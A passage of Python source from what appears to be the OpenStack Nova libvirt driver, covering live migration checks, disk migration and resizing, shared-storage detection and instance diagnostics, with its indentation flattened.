ret = self.get_instance_disk_info(instance['name'])
disk_infos = jsonutils.loads(ret)
necessary = 0
if disk_over_commit:
for info in disk_infos:
necessary += int(info['disk_size'])
else:
for info in disk_infos:
necessary += int(info['virt_disk_size'])
# Check that available disk > necessary disk
if (available - necessary) < 0:
reason = (_('Unable to migrate %(instance_uuid)s: '
'Disk of instance is too large(available'
' on destination host:%(available)s '
'< need:%(necessary)s)') %
{'instance_uuid': instance['uuid'],
'available': available,
'necessary': necessary})
raise exception.MigrationPreCheckError(reason=reason)
def _compare_cpu(self, cpu_info):
"""Checks the host cpu is compatible to a cpu given by xml.
"xml" must be a part of libvirt.openAuth(...).getCapabilities().
return values follows by virCPUCompareResult.
if 0 > return value, do live migration.
'http://libvirt.org/html/libvirt-libvirt.html#virCPUCompareResult'
:param cpu_info: json string of cpu feature from _get_cpu_info()
:returns:
None. if given cpu info is not compatible to this server,
raise exception.
"""
# NOTE(berendt): virConnectCompareCPU not working for Xen
if CONF.libvirt.virt_type == 'xen':
return 1
info = jsonutils.loads(cpu_info)
LOG.info(_LI('Instance launched has CPU info: %s'), cpu_info)
cpu = vconfig.LibvirtConfigCPU()
cpu.arch = info['arch']
cpu.model = info['model']
cpu.vendor = info['vendor']
cpu.sockets = info['topology']['sockets']
cpu.cores = info['topology']['cores']
cpu.threads = info['topology']['threads']
for f in info['features']:
cpu.add_feature(vconfig.LibvirtConfigCPUFeature(f))
u = "http://libvirt.org/html/libvirt-libvirt.html#virCPUCompareResult"
m = _("CPU doesn't have compatibility.\n\n%(ret)s\n\nRefer to %(u)s")
# unknown character exists in xml, then libvirt complains
try:
ret = self._conn.compareCPU(cpu.to_xml(), 0)
except libvirt.libvirtError as e:
with excutils.save_and_reraise_exception():
ret = unicode(e)
LOG.error(m, {'ret': ret, 'u': u})
if ret <= 0:
LOG.error(m, {'ret': ret, 'u': u})
raise exception.InvalidCPUInfo(reason=m % {'ret': ret, 'u': u})
def _create_shared_storage_test_file(self):
"""Makes tmpfile under CONF.instances_path."""
dirpath = CONF.instances_path
fd, tmp_file = tempfile.mkstemp(dir=dirpath)
LOG.debug("Creating tmpfile %s to notify to other "
"compute nodes that they should mount "
"the same storage.", tmp_file)
os.close(fd)
return os.path.basename(tmp_file)
def _check_shared_storage_test_file(self, filename):
"""Confirms existence of the tmpfile under CONF.instances_path.
Cannot confirm tmpfile return False.
"""
tmp_file = os.path.join(CONF.instances_path, filename)
if not os.path.exists(tmp_file):
return False
else:
return True
def _cleanup_shared_storage_test_file(self, filename):
"""Removes existence of the tmpfile under CONF.instances_path."""
tmp_file = os.path.join(CONF.instances_path, filename)
os.remove(tmp_file)
def ensure_filtering_rules_for_instance(self, instance, network_info):
"""Ensure that an instance's filtering rules are enabled.
When migrating an instance, we need the filtering rules to
be configured on the destination host before starting the
migration.
Also, when restarting the compute service, we need to ensure
that filtering rules exist for all running services.
"""
self.firewall_driver.setup_basic_filtering(instance, network_info)
self.firewall_driver.prepare_instance_filter(instance,
network_info)
# nwfilters may be defined in a separate thread in the case
# of libvirt non-blocking mode, so we wait for completion
timeout_count = range(CONF.live_migration_retry_count)
while timeout_count:
if self.firewall_driver.instance_filter_exists(instance,
network_info):
break
timeout_count.pop()
if len(timeout_count) == 0:
msg = _('The firewall filter for %s does not exist')
raise exception.NovaException(msg % instance.name)
greenthread.sleep(1)
def filter_defer_apply_on(self):
self.firewall_driver.filter_defer_apply_on()
def filter_defer_apply_off(self):
self.firewall_driver.filter_defer_apply_off()
def live_migration(self, context, instance, dest,
post_method, recover_method, block_migration=False,
migrate_data=None):
"""Spawning live_migration operation for distributing high-load.
:param context: security context
:param instance:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:param dest: destination host
:param post_method:
post operation method.
expected nova.compute.manager._post_live_migration.
:param recover_method:
recovery method when any exception occurs.
expected nova.compute.manager._rollback_live_migration.
:param block_migration: if true, do block migration.
:param migrate_data: implementation specific params
"""
greenthread.spawn(self._live_migration, context, instance, dest,
post_method, recover_method, block_migration,
migrate_data)
def _correct_listen_addr(self, old_xml_str, listen_addrs):
# NB(sross): can't just use LibvirtConfigGuest#parse_str
# here b/c it doesn't capture the entire XML
# description
xml_doc = etree.fromstring(old_xml_str)
# change over listen addresses
for dev in xml_doc.findall('./devices/graphics'):
gr_type = dev.get('type')
listen_tag = dev.find('listen')
if gr_type in ('vnc', 'spice'):
if listen_tag is not None:
listen_tag.set('address', listen_addrs[gr_type])
if dev.get('listen') is not None:
dev.set('listen', listen_addrs[gr_type])
return etree.tostring(xml_doc)
def _check_graphics_addresses_can_live_migrate(self, listen_addrs):
LOCAL_ADDRS = ('0.0.0.0', '127.0.0.1', '::', '::1')
local_vnc = CONF.vncserver_listen in LOCAL_ADDRS
local_spice = CONF.spice.server_listen in LOCAL_ADDRS
if ((CONF.vnc_enabled and not local_vnc) or
(CONF.spice.enabled and not local_spice)):
raise exception.MigrationError(
_('Your libvirt version does not support the'
' VIR_DOMAIN_XML_MIGRATABLE flag or your'
' destination node does not support'
' retrieving listen addresses. In order'
' for live migration to work properly, you'
' must configure the graphics (VNC and/or'
' SPICE) listen addresses to be either'
' the catch-all address (0.0.0.0 or ::) or'
' the local address (127.0.0.1 or ::1).'))
if listen_addrs is not None:
dest_local_vnc = listen_addrs['vnc'] in LOCAL_ADDRS
dest_local_spice = listen_addrs['spice'] in LOCAL_ADDRS
if ((CONF.vnc_enabled and not dest_local_vnc) or
(CONF.spice.enabled and not dest_local_spice)):
LOG.warn(_('Your libvirt version does not support the'
' VIR_DOMAIN_XML_MIGRATABLE flag, and the '
' graphics (VNC and/or SPICE) listen'
' addresses on the destination node do not'
' match the addresses on the source node.'
' Since the source node has listen'
' addresses set to either the catch-all'
' address (0.0.0.0 or ::) or the local'
' address (127.0.0.1 or ::1), the live'
' migration will succeed, but the VM will'
' continue to listen on the current'
' addresses.'))
def _live_migration(self, context, instance, dest, post_method,
recover_method, block_migration=False,
migrate_data=None):
"""Do live migration.
:param context: security context
:param instance:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:param dest: destination host
:param post_method:
post operation method.
expected nova.compute.manager._post_live_migration.
:param recover_method:
recovery method when any exception occurs.
expected nova.compute.manager._rollback_live_migration.
:param block_migration: if true, do block migration.
:param migrate_data: implementation specific params
"""
# Do live migration.
try:
if block_migration:
flaglist = CONF.libvirt.block_migration_flag.split(',')
else:
flaglist = CONF.libvirt.live_migration_flag.split(',')
flagvals = [getattr(libvirt, x.strip()) for x in flaglist]
logical_sum = reduce(lambda x, y: x | y, flagvals)
dom = self._lookup_by_name(instance["name"])
pre_live_migrate_data = (migrate_data or {}).get(
'pre_live_migration_result', {})
listen_addrs = pre_live_migrate_data.get('graphics_listen_addrs')
migratable_flag = getattr(libvirt, 'VIR_DOMAIN_XML_MIGRATABLE',
None)
if migratable_flag is None or listen_addrs is None:
self._check_graphics_addresses_can_live_migrate(listen_addrs)
dom.migrateToURI(CONF.libvirt.live_migration_uri % dest,
logical_sum,
None,
CONF.libvirt.live_migration_bandwidth)
else:
old_xml_str = dom.XMLDesc(migratable_flag)
new_xml_str = self._correct_listen_addr(old_xml_str,
listen_addrs)
dom.migrateToURI2(CONF.libvirt.live_migration_uri % dest,
None,
new_xml_str,
logical_sum,
None,
CONF.libvirt.live_migration_bandwidth)
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.error(_LE("Live Migration failure: %s"), e,
instance=instance)
recover_method(context, instance, dest, block_migration)
# Waiting for completion of live_migration.
timer = loopingcall.FixedIntervalLoopingCall(f=None)
def wait_for_live_migration():
"""waiting for live migration completion."""
try:
self.get_info(instance)['state']
except exception.InstanceNotFound:
timer.stop()
post_method(context, instance, dest, block_migration,
migrate_data)
timer.f = wait_for_live_migration
timer.start(interval=0.5).wait()
def _fetch_instance_kernel_ramdisk(self, context, instance):
"""Download kernel and ramdisk for instance in instance directory."""
instance_dir = libvirt_utils.get_instance_path(instance)
if instance['kernel_id']:
libvirt_utils.fetch_image(context,
os.path.join(instance_dir, 'kernel'),
instance['kernel_id'],
instance['user_id'],
instance['project_id'])
if instance['ramdisk_id']:
libvirt_utils.fetch_image(context,
os.path.join(instance_dir,
'ramdisk'),
instance['ramdisk_id'],
instance['user_id'],
instance['project_id'])
def rollback_live_migration_at_destination(self, context, instance,
network_info,
block_device_info,
destroy_disks=True,
migrate_data=None):
"""Clean up destination node after a failed live migration."""
self.destroy(context, instance, network_info, block_device_info,
destroy_disks, migrate_data)
def pre_live_migration(self, context, instance, block_device_info,
network_info, disk_info, migrate_data=None):
"""Preparation live migration."""
# Steps for volume backed instance live migration w/o shared storage.
is_shared_block_storage = True
is_shared_instance_path = True
is_block_migration = True
instance_relative_path = None
if migrate_data:
is_shared_block_storage = migrate_data.get(
'is_shared_block_storage', True)
is_shared_instance_path = migrate_data.get(
'is_shared_instance_path', True)
is_block_migration = migrate_data.get('block_migration', True)
instance_relative_path = migrate_data.get('instance_relative_path')
if not is_shared_instance_path:
# NOTE(mikal): this doesn't use libvirt_utils.get_instance_path
# because we are ensuring that the same instance directory name
# is used as was at the source
if instance_relative_path:
instance_dir = os.path.join(CONF.instances_path,
instance_relative_path)
else:
instance_dir = libvirt_utils.get_instance_path(instance)
if os.path.exists(instance_dir):
raise exception.DestinationDiskExists(path=instance_dir)
os.mkdir(instance_dir)
if not is_shared_block_storage:
# Ensure images and backing files are present.
self._create_images_and_backing(context, instance,
instance_dir, disk_info)
if not (is_block_migration or is_shared_instance_path):
# NOTE(angdraug): when block storage is shared between source and
# destination and instance path isn't (e.g. volume backed or rbd
# backed instance), instance path on destination has to be prepared
# Touch the console.log file, required by libvirt.
console_file = self._get_console_log_path(instance)
libvirt_utils.file_open(console_file, 'a').close()
# if image has kernel and ramdisk, just download
# following normal way.
self._fetch_instance_kernel_ramdisk(context, instance)
# Establishing connection to volume server.
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_info = blockinfo.get_info_from_bdm(
CONF.libvirt.virt_type, vol)
self._connect_volume(connection_info, disk_info)
# We call plug_vifs before the compute manager calls
# ensure_filtering_rules_for_instance, to ensure bridge is set up
# Retry operation is necessary because continuously request comes,
# concurrent request occurs to iptables, then it complains.
max_retry = CONF.live_migration_retry_count
for cnt in range(max_retry):
try:
self.plug_vifs(instance, network_info)
break
except processutils.ProcessExecutionError:
if cnt == max_retry - 1:
raise
else:
LOG.warn(_LW('plug_vifs() failed %(cnt)d. Retry up to '
'%(max_retry)d.'),
{'cnt': cnt,
'max_retry': max_retry},
instance=instance)
greenthread.sleep(1)
res_data = {'graphics_listen_addrs': {}}
res_data['graphics_listen_addrs']['vnc'] = CONF.vncserver_listen
res_data['graphics_listen_addrs']['spice'] = CONF.spice.server_listen
return res_data
def _create_images_and_backing(self, context, instance, instance_dir,
disk_info_json):
""":param context: security context
:param instance:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:param instance_dir:
instance path to use, calculated externally to handle block
migrating an instance with an old style instance path
:param disk_info_json:
json strings specified in get_instance_disk_info
"""
if not disk_info_json:
disk_info = []
else:
disk_info = jsonutils.loads(disk_info_json)
for info in disk_info:
base = os.path.basename(info['path'])
# Get image type and create empty disk image, and
# create backing file in case of qcow2.
instance_disk = os.path.join(instance_dir, base)
if not info['backing_file'] and not os.path.exists(instance_disk):
libvirt_utils.create_image(info['type'], instance_disk,
info['virt_disk_size'])
elif info['backing_file']:
# Creating backing file follows same way as spawning instances.
cache_name = os.path.basename(info['backing_file'])
image = self.image_backend.image(instance,
instance_disk,
CONF.libvirt.images_type)
if cache_name.startswith('ephemeral'):
image.cache(fetch_func=self._create_ephemeral,
fs_label=cache_name,
os_type=instance["os_type"],
filename=cache_name,
size=info['virt_disk_size'],
ephemeral_size=instance['ephemeral_gb'])
elif cache_name.startswith('swap'):
inst_type = flavors.extract_flavor(instance)
swap_mb = inst_type['swap']
image.cache(fetch_func=self._create_swap,
filename="swap_%s" % swap_mb,
size=swap_mb * units.Mi,
swap_mb=swap_mb)
else:
image.cache(fetch_func=libvirt_utils.fetch_image,
context=context,
filename=cache_name,
image_id=instance['image_ref'],
user_id=instance['user_id'],
project_id=instance['project_id'],
size=info['virt_disk_size'])
# if image has kernel and ramdisk, just download
# following normal way.
self._fetch_instance_kernel_ramdisk(context, instance)
def post_live_migration(self, context, instance, block_device_info,
migrate_data=None):
# Disconnect from volume server
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_dev = vol['mount_device'].rpartition("/")[2]
self._disconnect_volume(connection_info, disk_dev)
def post_live_migration_at_source(self, context, instance, network_info):
"""Unplug VIFs from networks at source.
:param context: security context
:param instance: instance object reference
:param network_info: instance network information
"""
self.unplug_vifs(instance, network_info)
def post_live_migration_at_destination(self, context,
instance,
network_info,
block_migration=False,
block_device_info=None):
"""Post operation of live migration at destination host.
:param context: security context
:param instance:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:param network_info: instance network information
:param block_migration: if true, post operation of block_migration.
"""
# Define migrated instance, otherwise, suspend/destroy does not work.
dom_list = self._conn.listDefinedDomains()
if instance["name"] not in dom_list:
# In case of block migration, destination does not have
# libvirt.xml
disk_info = blockinfo.get_disk_info(
CONF.libvirt.virt_type, instance, block_device_info)
xml = self._get_guest_xml(context, instance,
network_info, disk_info,
block_device_info=block_device_info,
write_to_disk=True)
self._conn.defineXML(xml)
def _get_instance_disk_info(self, instance_name, xml,
block_device_info=None):
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
volume_devices = set()
for vol in block_device_mapping:
disk_dev = vol['mount_device'].rpartition("/")[2]
volume_devices.add(disk_dev)
disk_info = []
doc = etree.fromstring(xml)
disk_nodes = doc.findall('.//devices/disk')
path_nodes = doc.findall('.//devices/disk/source')
driver_nodes = doc.findall('.//devices/disk/driver')
target_nodes = doc.findall('.//devices/disk/target')
for cnt, path_node in enumerate(path_nodes):
disk_type = disk_nodes[cnt].get('type')
path = path_node.get('file')
target = target_nodes[cnt].attrib['dev']
if not path:
LOG.debug('skipping disk for %s as it does not have a path',
instance_name)
continue
if disk_type != 'file':
LOG.debug('skipping %s since it looks like volume', path)
continue
if target in volume_devices:
LOG.debug('skipping disk %(path)s (%(target)s) as it is a '
'volume', {'path': path, 'target': target})
continue
# get the real disk size or
# raise a localized error if image is unavailable
dk_size = int(os.path.getsize(path))
disk_type = driver_nodes[cnt].get('type')
if disk_type == "qcow2":
backing_file = libvirt_utils.get_disk_backing_file(path)
virt_size = disk.get_disk_size(path)
over_commit_size = int(virt_size) - dk_size
else:
backing_file = ""
virt_size = dk_size
over_commit_size = 0
disk_info.append({'type': disk_type,
'path': path,
'virt_disk_size': virt_size,
'backing_file': backing_file,
'disk_size': dk_size,
'over_committed_disk_size': over_commit_size})
return jsonutils.dumps(disk_info)
def get_instance_disk_info(self, instance_name,
block_device_info=None):
try:
dom = self._lookup_by_name(instance_name)
xml = dom.XMLDesc(0)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
msg = (_('Error from libvirt while getting description of '
'%(instance_name)s: [Error Code %(error_code)s] '
'%(ex)s') %
{'instance_name': instance_name,
'error_code': error_code,
'ex': ex})
LOG.warn(msg)
raise exception.InstanceNotFound(instance_id=instance_name)
return self._get_instance_disk_info(instance_name, xml,
block_device_info)
def _get_disk_over_committed_size_total(self):
"""Return total over committed disk size for all instances."""
# Disk size that all instance uses : virtual_size - disk_size
disk_over_committed_size = 0
for dom in self._list_instance_domains():
try:
xml = dom.XMLDesc(0)
disk_infos = jsonutils.loads(
self._get_instance_disk_info(dom.name(), xml))
for info in disk_infos:
disk_over_committed_size += int(
info['over_committed_disk_size'])
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
LOG.warn(_LW(
'Error from libvirt while getting description of '
'%(instance_name)s: [Error Code %(error_code)s] %(ex)s'
) % {'instance_name': dom.name(),
'error_code': error_code,
'ex': ex})
except OSError as e:
if e.errno == errno.ENOENT:
LOG.warn(_LW('Periodic task is updating the host stat, '
'it is trying to get disk %(i_name)s, '
'but disk file was removed by concurrent '
'operations such as resize.'),
{'i_name': dom.name()})
elif e.errno == errno.EACCES:
LOG.warn(_LW('Periodic task is updating the host stat, '
'it is trying to get disk %(i_name)s, '
'but access is denied. It is most likely '
'due to a VM that exists on the compute '
'node but is not managed by Nova.'),
{'i_name': dom.name()})
else:
raise
# NOTE(gtt116): give other tasks a chance.
greenthread.sleep(0)
return disk_over_committed_size
def unfilter_instance(self, instance, network_info):
"""See comments of same method in firewall_driver."""
self.firewall_driver.unfilter_instance(instance,
network_info=network_info)
def get_host_stats(self, refresh=False):
"""Return the current state of the host.
If 'refresh' is True, run update the stats first.
"""
return self.host_state.get_host_stats(refresh=refresh)
def get_host_cpu_stats(self):
"""Return the current CPU state of the host."""
# Extract node's CPU statistics.
stats = self._conn.getCPUStats(libvirt.VIR_NODE_CPU_STATS_ALL_CPUS, 0)
# getInfo() returns various information about the host node
# No. 3 is the expected CPU frequency.
stats["frequency"] = self._conn.getInfo()[3]
return stats
def get_host_uptime(self, host):
"""Returns the result of calling "uptime"."""
# NOTE(dprince): host seems to be ignored for this call and in
# other compute drivers as well. Perhaps we should remove it?
out, err = utils.execute('env', 'LANG=C', 'uptime')
return out
def manage_image_cache(self, context, all_instances):
"""Manage the local cache of images."""
self.image_cache_manager.update(context, all_instances)
def _cleanup_remote_migration(self, dest, inst_base, inst_base_resize,
shared_storage=False):
"""Used only for cleanup in case migrate_disk_and_power_off fails."""
try:
if os.path.exists(inst_base_resize):
utils.execute('rm', '-rf', inst_base)
utils.execute('mv', inst_base_resize, inst_base)
if not shared_storage:
utils.execute('ssh', dest, 'rm', '-rf', inst_base)
except Exception:
pass
def _is_storage_shared_with(self, dest, inst_base):
# NOTE (rmk): There are two methods of determining whether we are
# on the same filesystem: the source and dest IP are the
# same, or we create a file on the dest system via SSH
# and check whether the source system can also see it.
shared_storage = (dest == self.get_host_ip_addr())
if not shared_storage:
tmp_file = uuid.uuid4().hex + '.tmp'
tmp_path = os.path.join(inst_base, tmp_file)
try:
utils.execute('ssh', dest, 'touch', tmp_path)
if os.path.exists(tmp_path):
shared_storage = True
os.unlink(tmp_path)
else:
utils.execute('ssh', dest, 'rm', tmp_path)
except Exception:
pass
return shared_storage
def migrate_disk_and_power_off(self, context, instance, dest,
flavor, network_info,
block_device_info=None,
timeout=0, retry_interval=0):
LOG.debug("Starting migrate_disk_and_power_off",
instance=instance)
# Checks if the migration needs a disk resize down.
for kind in ('root_gb', 'ephemeral_gb'):
if flavor[kind] < instance[kind]:
reason = _("Unable to resize disk down.")
raise exception.InstanceFaultRollback(
exception.ResizeError(reason=reason))
disk_info_text = self.get_instance_disk_info(instance['name'],
block_device_info=block_device_info)
disk_info = jsonutils.loads(disk_info_text)
# NOTE(dgenin): Migration is not implemented for LVM backed instances.
if (CONF.libvirt.images_type == 'lvm' and
not self._is_booted_from_volume(instance, disk_info_text)):
reason = "Migration is not supported for LVM backed instances"
raise exception.MigrationPreCheckError(reason)
# copy disks to destination
# rename instance dir to +_resize at first for using
# shared storage for instance dir (eg. NFS).
inst_base = libvirt_utils.get_instance_path(instance)
inst_base_resize = inst_base + "_resize"
shared_storage = self._is_storage_shared_with(dest, inst_base)
# try to create the directory on the remote compute node
# if this fails we pass the exception up the stack so we can catch
# failures here earlier
if not shared_storage:
utils.execute('ssh', dest, 'mkdir', '-p', inst_base)
self.power_off(instance, timeout, retry_interval)
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_dev = vol['mount_device'].rpartition("/")[2]
self._disconnect_volume(connection_info, disk_dev)
try:
utils.execute('mv', inst_base, inst_base_resize)
# if we are migrating the instance with shared storage then
# create the directory. If it is a remote node the directory
# has already been created
if shared_storage:
dest = None
utils.execute('mkdir', '-p', inst_base)
active_flavor = flavors.extract_flavor(instance)
for info in disk_info:
# assume inst_base == dirname(info['path'])
img_path = info['path']
fname = os.path.basename(img_path)
from_path = os.path.join(inst_base_resize, fname)
if (fname == 'disk.swap' and
active_flavor.get('swap', 0) != flavor.get('swap', 0)):
# To properly resize the swap partition, it must be
# re-created with the proper size. This is acceptable
# because when an OS is shut down, the contents of the
# swap space are just garbage, the OS doesn't bother about
# what is in it.
# We will not copy over the swap disk here, and rely on
# finish_migration/_create_image to re-create it for us.
continue
if info['type'] == 'qcow2' and info['backing_file']:
tmp_path = from_path + "_rbase"
# merge backing file
utils.execute('qemu-img', 'convert', '-f', 'qcow2',
'-O', 'qcow2', from_path, tmp_path)
if shared_storage:
utils.execute('mv', tmp_path, img_path)
else:
libvirt_utils.copy_image(tmp_path, img_path, host=dest)
utils.execute('rm', '-f', tmp_path)
else: # raw or qcow2 with no backing file
libvirt_utils.copy_image(from_path, img_path, host=dest)
except Exception:
with excutils.save_and_reraise_exception():
self._cleanup_remote_migration(dest, inst_base,
inst_base_resize,
shared_storage)
return disk_info_text
def _wait_for_running(self, instance):
state = self.get_info(instance)['state']
if state == power_state.RUNNING:
LOG.info(_LI("Instance running successfully."), instance=instance)
raise loopingcall.LoopingCallDone()
@staticmethod
def _disk_size_from_instance(instance, info):
"""Determines the disk size from instance properties
Returns the disk size by using the disk name to determine whether it
is a root or an ephemeral disk, then by checking properties of the
instance returns the size converted to bytes.
Returns 0 if the disk name not match (disk, disk.local).
"""
fname = os.path.basename(info['path'])
if fname == 'disk':
size = instance['root_gb']
elif fname == 'disk.local':
size = instance['ephemeral_gb']
else:
size = 0
return size * units.Gi
@staticmethod
def _disk_raw_to_qcow2(path):
"""Converts a raw disk to qcow2."""
path_qcow = path + '_qcow'
utils.execute('qemu-img', 'convert', '-f', 'raw',
'-O', 'qcow2', path, path_qcow)
utils.execute('mv', path_qcow, path)
@staticmethod
def _disk_qcow2_to_raw(path):
"""Converts a qcow2 disk to raw."""
path_raw = path + '_raw'
utils.execute('qemu-img', 'convert', '-f', 'qcow2',
'-O', 'raw', path, path_raw)
utils.execute('mv', path_raw, path)
def _disk_resize(self, info, size):
"""Attempts to resize a disk to size
Attempts to resize a disk by checking the capabilities and
preparing the format, then calling disk.api.extend.
Note: Currently only support disk extend.
"""
# If we have a non partitioned image that we can extend
# then ensure we're in 'raw' format so we can extend file system.
fmt, org = [info['type']] * 2
pth = info['path']
if (size and fmt == 'qcow2' and
disk.can_resize_image(pth, size) and
disk.is_image_partitionless(pth, use_cow=True)):
self._disk_qcow2_to_raw(pth)
fmt = 'raw'
if size:
use_cow = fmt == 'qcow2'
disk.extend(pth, size, use_cow=use_cow)
if fmt != org:
# back to qcow2 (no backing_file though) so that snapshot
# will be available
self._disk_raw_to_qcow2(pth)
def finish_migration(self, context, migration, instance, disk_info,
network_info, image_meta, resize_instance,
block_device_info=None, power_on=True):
LOG.debug("Starting finish_migration", instance=instance)
# resize disks. only "disk" and "disk.local" are necessary.
disk_info = jsonutils.loads(disk_info)
for info in disk_info:
size = self._disk_size_from_instance(instance, info)
if resize_instance:
self._disk_resize(info, size)
if info['type'] == 'raw' and CONF.use_cow_images:
self._disk_raw_to_qcow2(info['path'])
disk_info = blockinfo.get_disk_info(CONF.libvirt.virt_type,
instance,
block_device_info,
image_meta)
# assume _create_image do nothing if a target file exists.
self._create_image(context, instance,
disk_mapping=disk_info['mapping'],
network_info=network_info,
block_device_info=None, inject_files=False)
xml = self._get_guest_xml(context, instance, network_info, disk_info,
block_device_info=block_device_info,
write_to_disk=True)
self._create_domain_and_network(context, xml, instance, network_info,
block_device_info, power_on)
if power_on:
timer = loopingcall.FixedIntervalLoopingCall(
self._wait_for_running,
instance)
timer.start(interval=0.5).wait()
def _cleanup_failed_migration(self, inst_base):
"""Make sure that a failed migrate doesn't prevent us from rolling
back in a revert.
"""
try:
shutil.rmtree(inst_base)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def finish_revert_migration(self, context, instance, network_info,
block_device_info=None, power_on=True):
LOG.debug("Starting finish_revert_migration",
instance=instance)
inst_base = libvirt_utils.get_instance_path(instance)
inst_base_resize = inst_base + "_resize"
# NOTE(danms): if we're recovering from a failed migration,
# make sure we don't have a left-over same-host base directory
# that would conflict. Also, don't fail on the rename if the
# failure happened early.
if os.path.exists(inst_base_resize):
self._cleanup_failed_migration(inst_base)
utils.execute('mv', inst_base_resize, inst_base)
disk_info = blockinfo.get_disk_info(CONF.libvirt.virt_type,
instance,
block_device_info)
xml = self._get_guest_xml(context, instance, network_info, disk_info,
block_device_info=block_device_info)
self._create_domain_and_network(context, xml, instance, network_info,
block_device_info, power_on)
if power_on:
timer = loopingcall.FixedIntervalLoopingCall(
self._wait_for_running,
instance)
timer.start(interval=0.5).wait()
def confirm_migration(self, migration, instance, network_info):
"""Confirms a resize, destroying the source VM."""
self._cleanup_resize(instance, network_info)
@staticmethod
def _get_io_devices(xml_doc):
"""get the list of io devices from the xml document."""
result = {"volumes": [], "ifaces": []}
try:
doc = etree.fromstring(xml_doc)
except Exception:
return result
blocks = [('./devices/disk', 'volumes'),
('./devices/interface', 'ifaces')]
for block, key in blocks:
section = doc.findall(block)
for node in section:
for child in node.getchildren():
if child.tag == 'target' and child.get('dev'):
result[key].append(child.get('dev'))
return result
def get_diagnostics(self, instance):
domain = self._lookup_by_name(instance['name'])
output = {}
# get cpu time, might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
try:
cputime = domain.vcpus()[0]
for i in range(len(cputime)):
output["cpu" + str(i) + "_time"] = cputime[i][2]
except libvirt.libvirtError:
pass
# get io status
xml = domain.XMLDesc(0)
dom_io = LibvirtDriver._get_io_devices(xml)
for guest_disk in dom_io["volumes"]:
try:
# blockStats might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
stats = domain.blockStats(guest_disk)
output[guest_disk + "_read_req"] = stats[0]
output[guest_disk + "_read"] = stats[1]
output[guest_disk + "_write_req"] = stats[2]
output[guest_disk + "_write"] = stats[3]
output[guest_disk + "_errors"] = stats[4]
except libvirt.libvirtError:
pass
for interface in dom_io["ifaces"]:
try:
# interfaceStats might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
stats = domain.interfaceStats(interface)
output[interface + "_rx"] = stats[0]
output[interface + "_rx_packets"] = stats[1]
output[interface + "_rx_errors"] = stats[2]
output[interface + "_rx_drop"] = stats[3]
output[interface + "_tx"] = stats[4]
output[interface + "_tx_packets"] = stats[5]
output[interface + "_tx_errors"] = stats[6]
output[interface + "_tx_drop"] = stats[7]
except libvirt.libvirtError:
pass
output["memory"] = domain.maxMemory()
# memoryStats might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
try:
mem = domain.memoryStats()
for key in mem.keys():
output["memory-" + key] = mem[key]
except (libvirt.libvirtError, AttributeError):
pass
return output
def get_instance_diagnostics(self, instance):
domain = self._lookup_by_name(instance['name'])
xml = domain.XMLDesc(0)
xml_doc = etree.fromstring(xml)
(state, max_mem, mem, num_cpu, cpu_time) = domain.info()
config_drive = configdrive.required_by(instance)
launched_at = timeutils.normalize_time(instance['launched_at'])
uptime = timeutils.delta_seconds(launched_at,
timeutils.utcnow())
diags = diagnostics.Diagnostics(state=power_state.STATE_MAP[state],
driver='libvirt',
config_drive=config_drive,
hypervisor_os='linux',
uptime=uptime)
diags.memory_details.maximum = max_mem / units.Mi
diags.memory_details.used = mem / units.Mi
# get cpu time, might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
try:
cputime = domain.vcpus()[0]
num_cpus = len(cputime)
for i in range(num_cpus):
diags.add_cpu(time=cputime[i][2])
except libvirt.libvirtError:
pass
# get io status
dom_io = LibvirtDriver._get_io_devices(xml)
for guest_disk in dom_io["volumes"]:
try:
# blockStats might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
stats = domain.blockStats(guest_disk)
diags.add_disk(read_bytes=stats[1],
read_requests=stats[0],
write_bytes=stats[3],
write_requests=stats[2])
except libvirt.libvirtError:
pass
for interface in dom_io["ifaces"]:
try:
# interfaceStats might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
stats = domain.interfaceStats(interface)
diags.add_nic(rx_octets=stats[0],
rx_errors=stats[2],
rx_drop=stats[3],
rx_packets=stats[1],
tx_octets=stats[4],
tx_errors=stats[6],
tx_drop=stats[7],
tx_packets=stats[5])
except libvirt.libvirtError:
pass
# Update mac addresses of interface if stats have been reported
if len(diags.nic_details) > 0:
ret = xml_doc.findall('./devices/interface')
index = 0
for node in ret:
for child in node.getchildren():
if child.tag == 'mac':
diags.nic_details[index].mac_address = child.get(
'address')
return diags
def instance_on_disk(self, instance):
# ensure directories exist and are writable
instance_path = libvirt_utils.get_instance_path(instance)
LOG.debug('Checking instance files accessibility %s', instance_path)
return os.access(instance_path, os.W_OK)
def inject_network_info(self, instance, nw_info):
self.firewall_driver.setup_basic_filtering(instance, nw_info)
def _delete_instance_files(self, instance):
# NOTE(mikal): a shim to handle this file not using instance objects
# everywhere. Remove this when that conversion happens.
context = nova_context.get_admin_context(read_deleted='yes')
inst_obj = objects.Instance.get_by_uuid(context, instance['uuid'])
# NOTE(mikal): this code should be pushed up a layer when this shim is
# removed.
attempts = int(inst_obj.system_metadata.get('clean_attempts', '0'))
success = self.delete_instance_files(inst_obj)
inst_obj.system_metadata['clean_attempts'] = str(attempts + 1)
if success:
inst_obj.cleaned = True
inst_obj.save(context)
def delete_instance_files(self, instance):
target = libvirt_utils.get_instance_path(instance)
# A resize may be in progress
target_resize = target + '_resize'
# Other threads may attempt to rename the path, so renaming the path
# to target + '_del' (because it is atomic) and iterating through
# twice in the unlikely event that a concurrent rename occurs between
# the two rename attempts in this method. In general this method
